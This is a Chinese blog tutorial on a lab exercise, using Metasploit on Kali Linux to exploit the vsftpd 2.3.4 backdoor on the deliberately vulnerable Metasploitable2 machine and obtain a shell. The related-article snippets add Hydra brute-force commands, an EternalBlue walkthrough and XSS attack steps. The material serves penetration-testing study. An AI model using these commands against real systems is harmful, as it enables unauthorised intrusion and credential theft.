利用kali机对metaploitable做渗透攻击

最新推荐文章于 2024-04-06 16:11:24 发布
最新推荐文章于 2024-04-06 16:11:24 发布
阅读量1.7k 收藏 18
点赞数 3
分类专栏: 渗透测试 文章标签: linux vmware kali linux 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KT986/article/details/118055775
版权

本文仅作学习参考使用

一、虚拟机&&靶机的准备

1)kali linux的安装

https://www.kali.org/get-kali/#kali-virtual-machines

2)Vmware虚拟机的安装

3)靶机metaploitable2的安装

下载地址:https://sourceforge.net.projects/metasploitable/

(如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发已经调试好的kali linux给大家。需要靶机的安装包同样也可以私信或者留言)

 

二、使用kali机完成对第三方靶机Matesploitable的渗透攻击

1.在kali的终端输入msfconsole

(每次启动的界面都是不一样的,不必困扰)

 

2.输入search vsftpd查看所具有的漏洞利用代码

3.将搜索到的内容进行利用

     ----exploit/unix/ftp/vsftpd_234_backdoor

    输入 use exploit/unix/ftp/vsftpd_234_backdoor

4.输入show payloads

    来查看可以用的payloads

 

5.输入set payload cmd/unix/interact 进行设置payload

6.设置rhost,将ip地址设置为192.168.1.103(靶机的ip地址),并查看结果

注:靶机的ip地址要提前到靶机上查询

 

7.输入exploit进行溢出

如果可以看到反弹成功,得到shell,输入ifconfig,查看靶机ip地址。

 

以上内容仅供学习参考使用。

Coca cola add ice
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Kali Linux无线网络渗透kali安装教程
11-06
kali安装教程,适合新手练习渗透测试,ali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64...
VirtualBox安装kaliLinux2016.2
12-20
教程讲解的比较详细,实测通过的
kali2019.2链接.txt
05-03
kali-linux-2019.2-amd64.iso 百度网盘链接永久有效
Metasploitable3 + VMware 安装教程(记一次自己安装过程)
weixin_45891814的博客
04-06 922
下载方式自由选择,可以选择下载zip也可以使用git链接下载到本地。我使用的是VMware workstation 16 pro。(1)packer下载完成之后解压到任一位置即可。windows系统选择amd64下载即可。VMware网络上有很多教程,自行百度即可。1.下载metasploitable3。2.安装metasploitable3。(2)配置packer系统环境。2.下载packer。3.下载VMware。1.配置packer。
Metasploit渗透测试(框架介绍、靶安装、基本使用方法)
VN520的博客
12-20 1115
Metasploit framework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
web安全学习笔记
weixin_38226321的博客
12-19 1973
web安全学习笔记1. 1. 首先在VMware Workstation Pro里面安装win7环境,然后下载phpstudy,进行安装。
kali linux对Metasploitable2漏洞利用, postgresql的 代码执行获得反弹shell 笔记
边城浪子的博客
09-20 653
利用 msf 下 postgresql的 代码执行获得反弹shell. 实验环境: 攻击kali linux ip:192.168.172.134 目标:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap 192.168.172.129 nmap -sV -p 5432 192.168.172.129 step2:漏...
攻击和靶的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击和靶的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### phpmyadmin: http://192.168.0.113/phpmyadmin ### username: root password: owaspbwa
kali渗透metasploitable靶
热门推荐
浮生若梦的专栏
11-16 2万+
扫描阶段: 工具:Nmap 隐蔽扫描      nmap  -sS 192.168.8.135 端口爆破:FTP、SSH等 工具:Hydra 备用字典 爆破FTP hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135 爆破SSH
CFS三层靶渗透_Kali
qq_42383069的博客
03-18 5706
环境搭建 0x01. 环境下载: 【CFS三层靶环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟网卡(新建两个仅主模式的网卡) VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0 VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0 2)虚
kali使用msf渗透测试靶
qq_53175607的博客
11-18 1169
kali利用metasploit使用ms17-010(永恒之蓝)渗透windones7 免责声明:只用于靶测试 1.渗透之前要关闭windones7和主的防火墙及杀毒软件。 2.使用nmap扫描windones7 3.445端口开放,说明有ms17-010的漏洞。 4.使用命令msfconsole打开msf 5.使用search ms17-010命令查找攻击模块 6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击 use选择 7.show options
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
网络渗透测试实验三--XSS和SQL注入
weixin_51646864的博客
12-05 613
网络渗透测试实验三 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭
[渗透测试][Kali]对DC-6靶进行渗透测试
多皮哦的博客
07-18 2626
对DC-6靶进行渗透测试 本例使用的工具主要有:wpscan,BurpSuite,nc(瑞士军刀) 1. 搭建渗透平台 Kali 2018, DC-6靶, VMWare虚拟平台 DC-6靶渗透需要用到DC作者在https://www.vulnhub.com/entry/dc-6,315/给出的提示 发现主这个步骤省略 2. 枚举用户名 站点使用了wordpress,考虑使用wps...
渗透Metasploitable主
sGanYu
09-06 2585
攻击kali:Metasploitable2(一个特制的ubuntu操作系统,设计初衷作为安全工具测试和演示常见漏洞攻击的环境,默认开放高危端口如21、22、23、445、6000等等,而且具有很多未打补丁的高危漏洞) Metasploitable2漏洞:弱口令漏洞(如vnc、mysql、PostgreSQL等)、Samba MS-RPC Shell命令注入漏洞 、Vsftpd漏洞、Linux NFS共享目录配置漏洞、Tomcat管理台默认口令漏洞、root用户弱口令漏洞(SSH爆破) .
kali制作xss攻击linux
最新发布
05-14
Kali Linux是一种流行的渗透测试和安全评估操作系统,可以使用它来进行各种类型的安全测试。XSS(跨站点脚本)攻击是一种常见的Web应用程序漏洞,攻击者可以利用它来在受害者的浏览器中注入恶意代码并执行攻击。 在Kali Linux上制作XSS攻击,你需要掌握以下几个步骤: 1. 找到一个易受攻击的Web应用程序或网站,并确定其中一个页面容易受到XSS攻击。 2. 使用Kali Linux自带的Burp Suite等工具进行漏洞扫描和探测,以确认该页面存在XSS漏洞。 3. 利用Kali Linux自带的XSS攻击工具,如XSSFreak、BeEF等,生成可执行的XSS攻击代码,并将其注入到目标网站中。 4. 等待受害者访问目标网站,当受害者访问包含恶意代码的页面时,攻击者就可以获取到他们的敏感信息,或者控制他们的浏览器,让其执行恶意操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值